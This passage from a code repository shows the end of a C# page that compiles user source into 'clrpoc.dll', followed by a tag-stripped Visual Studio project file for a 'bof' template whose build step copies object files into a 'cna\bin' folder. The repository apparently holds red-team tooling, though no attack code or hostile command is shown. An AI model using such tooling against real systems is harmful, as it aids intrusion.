219 | var parameters = new CompilerParameters(new[] { "system.dll", "mscorlib.dll", "System.Core.dll", "System.Data.dll" }, "clrpoc.dll", false);
220 | parameters.GenerateExecutable = false;
221 | CompilerResults results = csc.CompileAssemblyFromSource(parameters, code);
222 | results.Errors.Cast().ToList().ForEach(error => errors = errors + "\nLine " + error.Line + ": " + error.ErrorText);
223 | return errors;
224 | }
225 |
226 | private void btnFileBrowse_Click(object sender, EventArgs e)
227 | {
228 |
229 | OpenFileDialog openFileDialog = new OpenFileDialog();
230 | if (openFileDialog.ShowDialog() == true)
231 | txtRaw.Text = openFileDialog.FileName;
232 |
233 | }
234 |
235 | private void CodeEdit_Click(object sender, RoutedEventArgs e)
236 | {
237 |
238 | Code codepage = new Code();
239 | this.NavigationService.Navigate(codepage);
240 | }
241 | }
242 | }
243 |
244 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/bof/bof.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}
24 | Win32Proj
25 | bof
26 | 10.0
27 |
28 |
29 |
30 | StaticLibrary
31 | true
32 | v142
33 | Unicode
34 | false
35 |
36 |
37 | StaticLibrary
38 | false
39 | v142
40 | true
41 | Unicode
42 | false
43 |
44 |
45 | StaticLibrary
46 | true
47 | v142
48 | Unicode
49 | false
50 |
51 |
52 | StaticLibrary
53 | false
54 | v142
55 | false
56 | Unicode
57 | false
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 | true
79 | .o
80 |
81 |
82 | true
83 | .o
84 |
85 |
86 | false
87 | .o
88 | $(ProjectName)
89 |
90 |
91 | false
92 | .lib
93 | $(ProjectName)
94 |
95 |
96 |
97 |
98 |
99 | Level3
100 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
101 | false
102 |
103 |
104 | Console
105 | true
106 |
107 |
108 |
109 |
110 |
111 |
112 | Level3
113 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
114 | false
115 |
116 |
117 | Console
118 | true
119 |
120 |
121 |
122 |
123 |
124 |
125 | Level3
126 | false
127 | true
128 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
129 | false
130 | false
131 | false
132 | false
133 | Disabled
134 | None
135 |
136 |
137 | Console
138 | true
139 | true
140 | true
141 |
142 |
143 | copy /Y "$(ProjectDir)Release\$(TargetName).obj" "$(SolutionDir)cna\bin\$(TargetName).$(PlatformTarget).o"
144 |
145 |
146 |
147 |
148 |
149 |
150 | Level3
151 | false
152 | true
153 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
154 | false
155 | Neither
156 | Disabled
157 | false
158 | None
159 | false
160 |
161 |
162 | Console
163 | true
164 | true
165 | true
166 |
167 |
168 | copy /Y "$(ProjectDir)x64\Release\$(TargetName).obj" "$(SolutionDir)cna\bin\$(TargetName).$(PlatformTarget).o"
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
--------------------------------------------------------------------------------